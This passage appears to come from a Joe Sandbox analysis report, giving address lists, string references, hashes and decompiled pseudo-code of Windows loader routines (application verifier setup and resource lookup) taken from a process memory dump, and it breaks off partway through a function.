0x04d3885a
0x00000000
0x04d3885a
0x04d3867e
0x04d38684
0x04d3868f
0x04d38693
0x00000000
0x00000000
0x04d386a0
0x04d3883f
0x04d38850
0x04d38852
0x04d38854
0x00000000
0x00000000
0x00000000
0x04d38854
0x04d386a6
0x04d386b2
0x04d386b5
0x04d386ba
0x04d386c5
0x04d386d4
0x04d38719
0x04d3872e
0x04d3872e
0x04d38730
0x00000000
0x00000000
0x04d38723
0x04d38728
0x04d3872a
0x04d3875e
0x00000000
0x04d3872c
0x04d3872c
0x00000000
0x04d3872c
0x04d3872a
0x04d38732
0x04d38740
0x04d3874a
0x04d3874c
0x04d3874e
0x04d38768
0x04d3876e
0x00000000
0x00000000
0x04d38774
0x04d3877a
0x04d3878e
0x04d38797
0x04d3879c
0x04d3879e
0x04d387a0
0x04d387ab
0x04d387ab
0x04d387ae
0x04d387b0
0x04d387b5
0x04d387b5
0x04d387bc
0x04d387c2
0x04d387cd
0x04d387d2
0x04d387d8
0x04d387d8
0x04d387da
0x04d387da
0x04d387e0
0x00000000
0x00000000
0x04d387ec
0x04d387f8
0x04d387fa
0x04d387fc
0x00000000
0x00000000
0x04d38802
0x04d38802
0x04d38806
0x04d3880d
0x04d3880f
0x04d3881a
0x04d3881a
0x04d3881f
0x04d38834
0x00000000
0x04d38834
0x04d38750
0x04d38754
0x04d38757
0x00000000
0x04d386d6
0x04d386dc
0x04d386df
0x04d386e4
0x04d386ef
0x04d386fd
0x04d38711
0x00000000
0x04d38711

Strings

VerifierDlls, xrefs: 04D3893D
VerifierFlags, xrefs: 04D388D0
AVRF: -*- final list of providers -*- , xrefs: 04D3880F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 04D386BD
HandleTraces, xrefs: 04D3890F
VerifierDebug, xrefs: 04D38925
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 04D386E7

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 28c5e5ffcbbf75fb7d1e12e4507ae8ddbfa886c67991e7cae667fbe849e97a31
Instruction ID: 3879d9a324bbbe25a8e5c485cef11f6a3325de21d5ca9ce8e1d03e63e983e819
Opcode Fuzzy Hash: 28c5e5ffcbbf75fb7d1e12e4507ae8ddbfa886c67991e7cae667fbe849e97a31
Instruction Fuzzy Hash: 72910672A04311AFE721EF6898A0B6677E6FB4175DF080458F5816B340D774FC14EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04CBAD00 Relevance: 8.1, Strings: 6, Instructions: 573
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E04CBAD00(signed int __ecx, signed int __edx, signed int _a4, signed int* _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, char** _a28) {
				char _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				short _v204;
				short _v720;
				signed short _v724;
				void* _v725;
				signed int _v732;
				char _v733;
				char _v734;
				char _v735;
				char _v736;
				signed int _v740;
				void* _v744;
				signed int _v748;
				signed int _v752;
				signed int _v756;
				signed int _v760;
				void* _v764;
				char* _v768;
				char _v772;
				signed int _v776;
				signed int _v780;
				char** _v784;
				void* _v788;
				void* _v792;
				void* _v796;
				void* _v800;
				signed int _v804;
				signed int _v808;
				signed int _v812;
				char _v816;
				signed int _v820;
				char* _v832;
				short _v834;
				signed short _v836;
				char* _v840;
				char _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t243;
				signed int _t244;
				signed int* _t251;
				signed char* _t252;
				signed int _t253;
				signed char* _t254;
				signed int* _t259;
				signed char* _t260;
				signed int _t261;
				signed char* _t262;
				signed int _t271;
				signed int _t285;
				intOrPtr _t288;
				signed int _t292;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed short _t299;
				signed int _t303;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr* _t325;
				intOrPtr _t326;
				signed char _t328;
				signed int _t331;
				signed int _t334;
				signed int _t340;
				void* _t341;
				signed int* _t343;
				signed int _t345;
				signed int _t352;
				signed int _t355;
				signed int _t356;
				intOrPtr* _t358;
				char* _t378;
				char* _t379;
				signed int _t380;
				signed int _t382;
				void* _t383;
				signed int _t384;
				signed int _t385;
				signed int _t387;
				void* _t388;
				void* _t389;
				signed int _t390;
				void* _t391;
				intOrPtr _t392;
				signed int _t410;
				void* _t415;

				_push(0xfffffffe);
				_push(0x4d8bf60);
				_push(E04CFAD20);
				_push( *[fs:0x0]);
				_t392 = _t391 - 0x338;
				_t243 =  *0x4dab370;
				_v12 = _v12 ^ _t243;
				_t244 = _t243 ^ _t390;
				_v32 = _t244;
				_push(_t244);
				 *[fs:0x0] =  &_v20;
				_v28 = _t392;
				_v760 = __edx;
				_v748 = __ecx;
				_t343 = _a8;
				_v752 = _t343;
				_v776 = _a16;
				_v812 = _a20;
				_v820 = _a24;
				_v784 = _a28;
				_v744 = 0;
				_v800 = 0;
				_v796 = 0;
				_v792 = 0;
				_v788 = 0;
				_v733 = 0;
				_t340 = _a4;
				if((_t340 & 0x00000040) != 0) {
					_v734 = 1;
				} else {
					_v734 = 0;
				}
				_v735 = 0;
				_v736 = 0;
				_v772 = 0x4c004a;
				_v768 = L"LdrpResSearchResourceMappedFile Enter";
				_v844 = 0x4a0048;
				_v840 = L"LdrpResSearchResourceMappedFile Exit";
				_t251 =  *( *[fs:0x30] + 0x50);
				if(_t251 != 0) {
					__eflags =  *_t251;
					if(__eflags == 0) {
						goto L3;
					}
					_t252 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					goto L4;
				} else {
					L3:
					_t252 = 0x7ffe0385;
					L4:
					if(( *_t252 & 0x00000001) != 0) {
						_t253 = E04CC3C40();
						__eflags = _t253;
						if(_t253 == 0) {
							_t254 = 0x7ffe0384;
						} else {
							_t254 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						E04D3FC01( &_v772,  *_t254 & 0x000000ff);
						_t343 = _v752;
					}
					_t387 = 0;
					_v756 = 0;
					_t382 = 0;
					if(_t340 < 0) {
						_t387 = 0x80;
						_v756 = 0x80;
					}
					_t371 = _a12;
					if(_t371 != 3) {
						_t345 = _v733;
						goto L10;
					} else {
						_t382 = _t343[2] & 0x0000ffff;
						_v8 = 0;
						_t333 =  *_t343;
						if(( *_t343 & 0xffff0000) != 0) {
							_t334 = E04CF79A0(_t333, L"MUI");
							_t392 = _t392 + 8;
							__eflags = _t334;
							if(__eflags != 0) {
								goto L8;
							}
							_t345 = 1;
							L9:
							_v733 = _t345;
							_v8 = 0xfffffffe;
							_t371 = _a12;
							L10:
							if((_t340 & 0x00000010) != 0 || _t371 - 1 > 2) {
								L21:
								if((_t387 & 0x00060000) == 0x60000) {
									_v732 = 0xc000008a;
									goto L51;
								}
								_t352 =  !_t387;
								_t271 =  !_t340;
								_t410 = _t271 & 0x00000010;
								asm("bt ecx, 0x13");
								asm("bt ecx, 0x11");
								_t371 = (_t371 & 0xffffff00 | _t410 != 0x00000000) & (_t271 & 0xffffff00 | _t410 > 0x00000000) & ((_t271 & 0xffffff00 | _t410 > 0x00000000) & 0xffffff00 | _t410 > 0x00000000);
								_v725 = _t410 != 0;
								_v724 = 1;
								_v720 = 0;
								if(_t371 != 0 || _a12 == 3) {
									if((_t340 & 0x00000010) != 0) {
										__eflags = _t340 & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										}
										goto L27;
									}
									L25:
									if((_t340 & 0x00000004) != 0) {
										_t387 = _t387 | 0x00000004;
										_v756 = _t387;
									}
									_t371 = _v760;
									_t352 = _v748;
									_t415 = E04CBA2E0(_t352, _v760, _t382, _t387,  &_v724);
									if(_t415 < 0) {
										__eflags = _t340 & 0x00001000;
										if(__eflags != 0) {
											goto L55;
										}
									}
									goto L27;
								} else {
									L27:
									asm("bt eax, 0x12");
									asm("bt esi, 0x13");
									if(((( !_t387 & 0xffffff00 | _t415 >= 0x00000000) & 0xffffff00 | (_t340 & 0x00000010) == 0x00000000) & (_t352 & 0xffffff00 | _t415 >= 0x00000000) & ( !_t387 & 0xffffff00 | _t415 >= 0x00000000)) == 0) {
										_push( &_v792);
										_push( &_v800);
										_push(_t340);
										_push(_v760);
										_push(_v748);
										_t264 = E04CBB360(_t340, _t382, _t387, __eflags);
										__eflags = _t264;
										if(_t264 >= 0) {
											goto L28;
										}
										goto L55;
									}
									L28:
									_t355 = _v725;
									L29:
									while(1) {
										if((_t387 & 0x00020000) != 0) {
											_t355 = 0;
											_v725 = 0;
										}
										_t384 = 0;
										_v732 = 0;
										_v740 = 0;
										_v764 = 0;
										_t371 = 0;
										while(1) {
											_v780 = _t371;
											if(_t371 >= (_v724 & 0x0000ffff)) {
												break;
											}
											if(_t355 != 0) {
												_v744 = 0;
												_v740 = 0;
												_t371 =  *(_t390 + _t371 * 8 - 0x2cc) & 0x0000ffff;
												_t288 =  *((intOrPtr*)(_t390 + _v780 * 8 - 0x2c8));
												__eflags = _t371;
												if(_t371 != 0) {
													__eflags = _t288 - 0xa;
													if(_t288 == 0xa) {
														_t384 = 0xc000000d;
														_v732 = 0xc000000d;
														L74:
														_t371 = _v780 + 1;
														continue;
													}
													_v764 = _t371;
													__eflags = _t355;
													if(__eflags == 0) {
														goto L33;
													}
													_push(_t387 | 0x00001000);
													_push( &_v740);
													_push( &_v744);
													_push(_v764);
													_push(_v748);
													_t384 = E04CBBDE0(_t340, _t384, _t387, __eflags);
													_v732 = _t384;
													__eflags = _t384;
													if(_t384 < 0) {
														__eflags = _t384 - 0xc0000034;
														if(_t384 == 0xc0000034) {
															L117:
															_t384 = 0xc00b0001;
															_v732 = 0xc00b0001;
															L130:
															_t355 = _v725;
															goto L74;
														}
														__eflags = _t384 - 0xc000003a;
														if(_t384 != 0xc000003a) {
															goto L130;
														}
														goto L117;
													}
													_v735 = 1;
													__eflags = _v740;
													if(__eflags == 0) {
														_push(1);
														_push(0x200);
														_push( &_v740);
														_push(_v744);
														_t384 = E04CBAB70(_t340, _t384, _t387, __eflags);
														_v732 = _t384;
													}
													__eflags = _t340 & 0x00001000;
													if(__eflags == 0) {
														L82:
														_push( &_v788);
														_push( &_v796);
														_push(_t340);
														_push(_v740);
														_push(_v744);
														_t384 = E04CBB360(_t340, _t384, _t387, __eflags);
														_v732 = _t384;
														_t355 = _v725;
														__eflags = _t384;
														if(_t384 >= 0) {
															goto L33;
														}
														goto L74;
													} else {
														__eflags = _t384;
														if(__eflags < 0) {
															L48:
															_t355 = _v725;
															break;
														}
														goto L82;
													}
												}
												__eflags = _t288 - 2;
												if(_t288 != 2) {
													_t384 = 0xc000000d;
													_v732 = 0xc000000d;
												}
												goto L74;
											}
											L33:
											_v816 = 0;
											_t292 = (0 | _t355 != 0x00000000) - 0x00000001 &  &_v764;
											if(_t355 != 0) {
												_v804 = _t340 | 0x00000020;
											} else {
												_v804 = _t340;
											}
											_t378 = _v812;
											if(_t378 == 0) {
												_t378 =  &_v816;
											}
											_v808 = _t378;
											if(_t355 != 0) {
												_t379 = _v788;
											} else {
												_t379 = _v792;
											}
											_v768 = _t379;
											if(_t355 != 0) {
												_t385 = _v796;
											} else {
												_t385 = _v800;
											}
											if(_t355 != 0) {
												_t380 = _v740;
											} else {
												_t380 = _v760;
											}
											if(_t355 != 0) {
												_t356 = _v744;
											} else {
												_t356 = _v748;
											}
											_t371 = 0;
											_t384 = E04CBE9A0(_t356, 0, _t380, _t385, _v768, 0, _v752, _a12,  &_v724, _v776, _v808, _v804, _t292);
											_v732 = _t384;
											if(_v734 != 0) {
												_t296 =  !_t387;
												__eflags = _t296 & 0x00040000;
												if((_t296 & 0x00040000) == 0) {
													goto L45;
												}
												_t297 = _v725;
												__eflags = _t384;
												if(_t384 < 0) {
													goto L58;
												}
												_t371 = _v776;
												__eflags = _t371;
												if(_t371 == 0) {
													goto L46;
												}
												__eflags = _t297;
												if(_t297 == 0) {
													goto L46;
												}
												_t310 = _v812;
												__eflags = _t310;
												if(_t310 == 0) {
													_t311 = _v816;
												} else {
													_t311 =  *_t310;
												}
												_t384 = E04CB872A(_v744, _t371, _t311,  *((intOrPtr*)(_v752 + 0xc)), 1);
												_v732 = _t384;
												__eflags = _t384;
												if(_t384 < 0) {
													 *_v776 = 0;
													__eflags = _t384 - 0xc000007b;
													if(_t384 == 0xc000007b) {
														goto L51;
													}
												}
												goto L45;
											} else {
												L45:
												_t297 = _v725;
												L46:
												if(_t384 < 0) {
													L58:
													__eflags = _t297;
													if(__eflags != 0) {
														_t371 = _v760;
														_t298 = E04D430EE(_t340, _v748, _v760, _t384, __eflags, _v744, _v740);
														__eflags = _t298;
														if(_t298 != 0) {
															goto L48;
														}
														goto L130;
													}
													__eflags = _t384;
													if(_t384 < 0) {
														goto L48;
													}
												}
												_t358 = _v784;
												if(_t358 != 0) {
													_t299 = _v764;
													__eflags = _t299;
													if(_t299 != 0) {
														_v832 =  &_v204;
														_v834 = 0xac;
														_t384 = E04CD5A40(_t371, _t299 & 0x0000ffff,  &_v836, 2, 0);
														_v732 = _t384;
														__eflags = _t384;
														if(_t384 < 0) {
															goto L51;
														}
														_t303 = (_v836 & 0x0000ffff) >> 1;
														__eflags = _t303;
														_t358 = _v784;
														L135:
														_v768 = _t303;
														_v8 = 1;
														__eflags = _t303 -  *_t358;
														if(_t303 >=  *_t358) {
															L138:
															 *_t358 = _t303 + 1;
															_v732 = 0xc0000023;
															_v8 = 0xfffffffe;
															goto L51;
														}
														_t371 = _v820;
														__eflags = _t371;
														if(_t371 == 0) {
															goto L138;
														}
														_t389 = _t303 + _t303;
														E04CF88C0(_t371,  &_v204, _t389);
														_t392 = _t392 + 0xc;
														 *_v784 =  &(_v768[1]);
														 *((short*)(_t389 + _v820)) = 0;
														_v8 = 0xfffffffe;
														_t387 = _v756;
														goto L48;
													}
													_t303 = 0;
													_v204 = 0;
													goto L135;
												}
												goto L48;
											}
										}
										if(_t355 != 0) {
											__eflags = _t340 & 0x00200000;
											if((_t340 & 0x00200000) == 0) {
												_t371 = _v740;
												E04CB0C12(_v744, _v740, _v752, _a12);
												_t355 = _v725;
											}
										}
										if(_t384 < 0) {
											__eflags = _t355;
											if(_t355 != 0) {
												__eflags = _v736;
												if(_v736 != 0) {
													L143:
													__eflags = _t387 & 0x00040000;
													if((_t387 & 0x00040000) != 0) {
														_t355 = 0;
														_v725 = 0;
													} else {
														_t387 = _t387 | 0x00020000;
														_v756 = _t387;
													}
													goto L62;
												}
												__eflags = _v735;
												if(_v735 != 0) {
													goto L143;
												}
												_t285 = L04CA87E0(_v748);
												_t355 = _v725;
												__eflags = _t285;
												if(_t285 < 0) {
													goto L143;
												}
												_t387 = _t387 | 0x00400000;
												_v756 = _t387;
												_v736 = 1;
											}
											L62:
											__eflags = _t384;
											if(_t384 >= 0) {
												goto L51;
											}
											__eflags = _t355;
											if(_t355 == 0) {
												goto L51;
											}
											continue;
										} else {
											goto L51;
										}
									}
								}
							} else {
								_t325 = _v752;
								if(_t371 != 3) {
									_t371 = 0;
								} else {
									_t371 =  *(_t325 + 8) & 0x0000ffff;
								}
								if((_t340 & 0x01000000) != 0) {
									_t340 = _t340 | 0x00000010;
									goto L21;
								} else {
									_t326 =  *_t325;
									if(_t326 != 0x10) {
										__eflags = _t326 - 0x18;
										if(__eflags == 0) {
											goto L16;
										}
										__eflags = _t345;
										if(__eflags == 0) {
											L17:
											_push(1);
											_push(_t340);
											_push(0);
											_push(_v760);
											_push(_v748);
											_t331 = E04CBB5E0(_t340, _t382, _t387, _t405);
											_v732 = _t331;
											if(_t331 >= 0) {
												_t371 = _v752;
												_t387 = _t387 | E04CB8160(_v748, _t371, _t345, _t340);
												L20:
												_v756 = _t387;
												goto L21;
											}
											if(_t331 != 0xc000008a) {
												L51:
												_t259 =  *( *[fs:0x30] + 0x50);
												if(_t259 != 0) {
													__eflags =  *_t259;
													if( *_t259 == 0) {
														goto L52;
													}
													_t260 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													L53:
													if(( *_t260 & 0x00000001) != 0) {
														_t261 = E04CC3C40();
														__eflags = _t261;
														if(_t261 == 0) {
															_t262 = 0x7ffe0384;
														} else {
															_t262 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
														}
														_t371 =  *_t262 & 0x000000ff;
														E04D3FC01( &_v844,  *_t262 & 0x000000ff);
													}
													_t264 = _v732;
													L55:
													 *[fs:0x0] = _v20;
													_pop(_t383);
													_pop(_t388);
													_pop(_t341);
													return E04CF4B50(_t264, _t341, _v32 ^ _t390, _t371, _t383, _t388);
												}
												L52:
												_t260 = 0x7ffe0385;
												goto L53;
											}
											_t387 = _t387 | 0x00080000;
											goto L20;
										}
									}
									L16:
									_t328 =  !_t340;
									_t405 = _t328 & 0x00000008;
									if((_t328 & 0x00000008) != 0) {
										__eflags = _t371;
										if(__eflags != 0) {
											__eflags = _t371 - 0x400;
											if(__eflags == 0) {
												goto L70;
											}
											__eflags = _t371 - 0x800;
											if(__eflags != 0) {
												goto L17;
											}
										}
										L70:
										_t340 = _t340 | 0x00000010;
										goto L21;
									}
									goto L17;
								}
							}
						}
						L8:
						_t345 = 0;
						goto L9;
					}
				}
			}

0x04cbad05
0x04cbad07
0x04cbad0c
0x04cbad17
0x04cbad18
0x04cbad1e
0x04cbad23
0x04cbad26
0x04cbad28
0x04cbad2e
0x04cbad32
0x04cbad38
0x04cbad3b
0x04cbad41
0x04cbad47
0x04cbad4a
0x04cbad53
0x04cbad5c
0x04cbad65
0x04cbad6e
0x04cbad74
0x04cbad7e
0x04cbad88
0x04cbad92
0x04cbad9c
0x04cbada6
0x04cbadad
0x04cbadb3
0x04d13164
0x04cbadb9
0x04cbadb9
0x04cbadb9
0x04cbadc0
0x04cbadc7
0x04cbadce
0x04cbadd8
0x04cbade2
0x04cbadec
0x04cbadfc
0x04cbae01
0x04d13170
0x04d13173
0x00000000
0x00000000
0x04d13182
0x00000000
0x04cbae07
0x04cbae07
0x04cbae07
0x04cbae0c
0x04cbae0f
0x04d1318c
0x04d13191
0x04d13193
0x04d131a5
0x04d13195
0x04d1319e
0x04d1319e
0x04d131b3
0x04d131b8
0x04d131b8
0x04cbae15
0x04cbae17
0x04cbae1d
0x04cbae21
0x04d131c3
0x04d131c8
0x04d131c8
0x04cbae27
0x04cbae2d
0x04cbb166
0x00000000
0x04cbae33
0x04cbae33
0x04cbae37
0x04cbae3e
0x04cbae45
0x04cbb336
0x04cbb33b
0x04cbb33e
0x04cbb340
0x00000000
0x00000000
0x04cbb346
0x04cbae4d
0x04cbae4d
0x04cbae53
0x04cbae5a
0x04cbae5d
0x04cbae60
0x04cbaedb
0x04cbaee7
0x04d13231
0x00000000
0x04d13231
0x04cbaeef
0x04cbaef3
0x04cbaef5
0x04cbaefa
0x04cbaf03
0x04cbaf0a
0x04cbaf0c
0x04cbaf18
0x04cbaf21
0x04cbaf2a
0x04cbaf35
0x04cbb17c
0x04cbb17f
0x00000000
0x00000000
0x00000000
0x04cbb185
0x04cbaf3b
0x04cbaf3e
0x04d13240
0x04d13243
0x04d13243
0x04cbaf4d
0x04cbaf53
0x04cbaf5e
0x04cbaf60
0x04d1324e
0x04d13254
0x00000000
0x00000000
0x04d1325a
0x00000000
0x04cbaf66
0x04cbaf66
0x04cbaf6a
0x04cbaf71
0x04cbaf82
0x04cbb110
0x04cbb117
0x04cbb118
0x04cbb119
0x04cbb11f
0x04cbb125
0x04cbb12a
0x04cbb12c
0x00000000
0x00000000
0x00000000
0x04cbb132
0x04cbaf88
0x04cbaf88
0x00000000
0x04cbaf90
0x04cbaf96
0x04d1325f
0x04d13261
0x04d13261
0x04cbaf9c
0x04cbaf9e
0x04cbafa4
0x04cbafac
0x04cbafb3
0x04cbafb5
0x04cbafb5
0x04cbafc4
0x00000000
0x00000000
0x04cbafcc
0x04cbb19b
0x04cbb1a5
0x04cbb1af
0x04cbb1bd
0x04cbb1c4
0x04cbb1c7
0x04cbb1ff
0x04cbb202
0x04d1326c
0x04d13271
0x04cbb1d9
0x04cbb1df
0x00000000
0x04cbb1df
0x04cbb208
0x04cbb20f
0x04cbb211
0x00000000
0x00000000
0x04cbb21e
0x04cbb225
0x04cbb22c
0x04cbb22d
0x04cbb233
0x04cbb23e
0x04cbb240
0x04cbb246
0x04cbb248
0x04d1327c
0x04d13282
0x04d13290
0x04d13290
0x04d13295
0x04d13378
0x04d13378
0x00000000
0x04d13378
0x04d13284
0x04d1328a
0x00000000
0x00000000
0x00000000
0x04d1328a
0x04cbb24e
0x04cbb255
0x04cbb25c
0x04d132a0
0x04d132a2
0x04d132ad
0x04d132ae
0x04d132b9
0x04d132bb
0x04d132bb
0x04cbb262
0x04cbb268
0x04cbb272
0x04cbb278
0x04cbb27f
0x04cbb280
0x04cbb281
0x04cbb287
0x04cbb292
0x04cbb294
0x04cbb29a
0x04cbb2a0
0x04cbb2a2
0x00000000
0x00000000
0x00000000
0x04cbb26a
0x04cbb26a
0x04cbb26c
0x04cbb0b1
0x04cbb0b1
0x00000000
0x04cbb0b1
0x00000000
0x04cbb26c
0x04cbb268
0x04cbb1c9
0x04cbb1cc
0x04cbb1ce
0x04cbb1d3
0x04cbb1d3
0x00000000
0x04cbb1cc
0x04cbafd2
0x04cbafd2
0x04cbafea
0x04cbafee
0x04cbb2b2
0x04cbaff4
0x04cbaff4
0x04cbaff4
0x04cbaffa
0x04cbb002
0x04cbb171
0x04cbb171
0x04cbb008
0x04cbb010
0x04cbb2bd
0x04cbb016
0x04cbb016
0x04cbb016
0x04cbb01c
0x04cbb024
0x04cbb2c8
0x04cbb02a
0x04cbb02a
0x04cbb02a
0x04cbb032
0x04cbb2d3
0x04cbb038
0x04cbb038
0x04cbb038
0x04cbb040
0x04cbb2de
0x04cbb046
0x04cbb046
0x04cbb046
0x04cbb079
0x04cbb080
0x04cbb082
0x04cbb08f
0x04d132c8
0x04d132ca
0x04d132cf
0x00000000
0x00000000
0x04d132d5
0x04d132db
0x04d132dd
0x00000000
0x00000000
0x04d132e3
0x04d132e9
0x04d132eb
0x00000000
0x00000000
0x04d132f1
0x04d132f3
0x00000000
0x00000000
0x04d132f9
0x04d132ff
0x04d13301
0x04d13307
0x04d13303
0x04d13303
0x04d13303
0x04d13326
0x04d13328
0x04d1332e
0x04d13330
0x04d1333c
0x04d13342
0x04d13348
0x00000000
0x00000000
0x04d1334e
0x00000000
0x04cbb095
0x04cbb095
0x04cbb095
0x04cbb09b
0x04cbb09d
0x04cbb134
0x04cbb134
0x04cbb136
0x04d1335f
0x04d1336b
0x04d13370
0x04d13372
0x00000000
0x00000000
0x00000000
0x04d13372
0x04cbb13c
0x04cbb13e
0x00000000
0x00000000
0x04cbb144
0x04cbb0a3
0x04cbb0ab
0x04d13383
0x04d1338a
0x04d1338d
0x04d133a0
0x04d133ab
0x04d133c6
0x04d133c8
0x04d133ce
0x04d133d0
0x00000000
0x00000000
0x04d133dd
0x04d133dd
0x04d133df
0x04d133e5
0x04d133e5
0x04d133eb
0x04d133f2
0x04d133f4
0x04d13441
0x04d13442
0x04d13444
0x04d1344e
0x00000000
0x04d1344e
0x04d133f6
0x04d133fc
0x04d133fe
0x00000000
0x00000000
0x04d13400
0x04d1340c
0x04d13411
0x04d13421
0x04d1342b
0x04d1342f
0x04d13436
0x00000000
0x04d13436
0x04d1338f
0x04d13391
0x00000000
0x04d13391
0x00000000
0x04cbb0ab
0x04cbb08f
0x04cbb0b9
0x04cbb2e9
0x04cbb2ef
0x04cbb2fe
0x04cbb30a
0x04cbb30f
0x04cbb30f
0x04cbb2ef
0x04cbb0c1
0x04cbb149
0x04cbb14b
0x04d13488
0x04d1348f
0x04d134c7
0x04d134c7
0x04d134cd
0x04d134e0
0x04d134e2
0x04d134cf
0x04d134cf
0x04d134d5
0x04d134d5
0x00000000
0x04d134cd
0x04d13491
0x04d13498
0x00000000
0x00000000
0x04d134a0
0x04d134a5
0x04d134ab
0x04d134ad
0x00000000
0x00000000
0x04d134af
0x04d134b5
0x04d134bb
0x04d134bb
0x04cbb151
0x04cbb151
0x04cbb153
0x00000000
0x00000000
0x04cbb159
0x04cbb15b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04cbb0c1
0x04cbaf90
0x04cbae6a
0x04cbae6a
0x04cbae73
0x04d13201
0x04cbae79
0x04cbae79
0x04cbae79
0x04cbae83
0x04d13208
0x00000000
0x04cbae89
0x04cbae89
0x04cbae8e
0x04cbb31a
0x04cbb31d
0x00000000
0x00000000
0x04cbb323
0x04cbb325
0x04cbaea0
0x04cbaea0
0x04cbaea2
0x04cbaea3
0x04cbaea5
0x04cbaeab
0x04cbaeb1
0x04cbaeb6
0x04cbaebe
0x04cbb1e7
0x04cbb1f8
0x04cbaed5
0x04cbaed5
0x00000000
0x04cbaed5
0x04cbaec9
0x04cbb0c7
0x04cbb0cd
0x04cbb0d2
0x04d134ed
0x04d134f0
0x00000000
0x00000000
0x04d134ff
0x04cbb0dd
0x04cbb0e0
0x04d13509
0x04d1350e
0x04d13510
0x04d13522
0x04d13512
0x04d1351b
0x04d1351b
0x04d13527
0x04d13530
0x04d13530
0x04cbb0e6
0x04cbb0ec
0x04cbb0ef
0x04cbb0f7
0x04cbb0f8
0x04cbb0f9
0x04cbb107
0x04cbb107
0x04cbb0d8
0x04cbb0d8
0x00000000
0x04cbb0d8
0x04cbaecf
0x00000000
0x04cbaecf
0x04cbb32b
0x04cbae94
0x04cbae96
0x04cbae98
0x04cbae9a
0x04cbb18a
0x04cbb18d
0x04d13215
0x04d13218
0x00000000
0x00000000
0x04d13223
0x04d13226
0x00000000
0x00000000
0x04d1322c
0x04cbb193
0x04cbb193
0x00000000
0x04cbb193
0x00000000
0x04cbae9a
0x04cbae83
0x04cbae60
0x04cbae4b
0x04cbae4b
0x00000000
0x04cbae4b
0x04cbae2d

Strings

#, xrefs: 04D13444
LdrpResSearchResourceMappedFile Enter, xrefs: 04CBADD8
LdrpResSearchResourceMappedFile Exit, xrefs: 04CBADEC
J, xrefs: 04CBADCE
H, xrefs: 04CBADE2
MUI, xrefs: 04CBB330

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
API String ID: 0-4098886588
Opcode ID: fe04e6ef57d1d0539ce67ba01b9d89e1b692b1cae5d49d50fb6b8434c2f08755
Instruction ID: ded9c23ff88dad9a55943def77dbf2fd2796e831d74511f856b24139d94f940d
Opcode Fuzzy Hash: fe04e6ef57d1d0539ce67ba01b9d89e1b692b1cae5d49d50fb6b8434c2f08755
Instruction Fuzzy Hash: 3D32AF70A042699BEF21CF15DC84BEEB7B6AF45344F1441E9E889A7250E771BF819F80

Uniqueness

Uniqueness Score: -1.00%

Function 04CE631F Relevance: 7.8, Strings: 6, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E04CE631F(intOrPtr __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _t71;
				void* _t73;
				signed int _t77;
				signed int _t79;
				char* _t84;
				intOrPtr _t85;
				signed int _t86;
				signed int _t88;
				signed char* _t89;
				void* _t99;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed char _t109;
				void* _t111;
				intOrPtr _t112;
				intOrPtr _t116;
				intOrPtr _t124;
				intOrPtr _t127;
				signed char _t130;
				signed int _t132;
				signed int _t133;
				intOrPtr _t136;
				void* _t138;
				signed int* _t140;
				signed short _t141;
				signed int _t145;
				void* _t147;
				signed int _t148;
				signed int _t149;
				void* _t151;
				void* _t153;

				_push(__esi);
				_push(__edi);
				_t145 = __edx;
				_t136 = __ecx;
				if( *0x4da68d4 == 0) {
					E04D31419();
				}
				_t71 =  *[fs:0x18];
				if(( *(_t71 + 0xfca) & 0x00004000) != 0) {
					return _t71;
				} else {
					_t116 = _t136;
					_t132 = _t145;
					_pop(_t138);
					_pop(_t147);
					_push(0x30);
					_push(0x4d8c780);
					E04D07BE4(_t111, _t138, _t147);
					 *(_t151 - 0x28) = _t132;
					 *((intOrPtr*)(_t151 - 0x20)) = _t116;
					_t112 =  *[fs:0x18];
					 *((intOrPtr*)(_t151 - 0x30)) = _t112;
					_t148 = 0;
					 *(_t151 - 0x24) = 0;
					while(1) {
						L6:
						_t133 = 0x2000;
						_t118 = 1;
						_t73 = 0;
						asm("lock cmpxchg [edi], ecx");
						if(0 != 1 || ( *(_t112 + 0xfca) & 0x00002000) != 0) {
							goto L8;
						}
						L44:
						_t104 =  *0x4da5d50; // 0x50
						__eflags = _t104;
						if(_t104 == 0) {
							L51:
							 *((intOrPtr*)(_t151 - 0x40)) = 0xfffb6c20;
